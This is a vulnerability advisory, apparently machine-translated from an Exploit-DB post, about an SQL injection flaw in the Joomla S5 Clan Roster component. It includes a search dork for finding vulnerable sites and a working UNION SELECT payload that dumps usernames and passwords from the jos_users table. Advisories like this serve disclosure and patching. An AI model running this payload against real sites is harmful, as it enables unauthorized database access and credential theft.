Release date:
Updated on: 2013-05-22
Affected Systems:
Joomla! S5 Clan Roster
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59993
Joomla! The S5 Clan Roster component can classify game family members.
Joomla! The S5 Clan Roster component has the SQL injection vulnerability in com_s5clanroster (index. php, id param). Successful exploitation of this vulnerability can lead to unauthorized database operations.
<* Source: AtT4CKxT3rR0r1ST
Link: http://www.exploit-db.com/exploits/25410/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Joomla Component com_s5clanroster SQL Injection Vulnerability
========================================================== ======================================
######################################## ############################
..:. Author: AtT4CKxT3rR0r1ST [F.Hack@w.cn]
..:. Dork: inurl: "com_s5clanroster"
.:. Script: http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
######################################## ############################
=== [Exploit] ===
SQL Injection:
====================
Server/index. php? Option = com_s5clanroster & view = s5clanroster & layout = category & task = category & id = 1 [SQL]
Server/index. php? Option = com_s5clanroster & view = s5clanroster & layout = category & task = category & id =-null' + /*! 50000UnIoN */+ /*! 50000SeLeCt */group_concat (username, 0x3a, password), 222 + from + jos_users ---
######################################## ############################
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html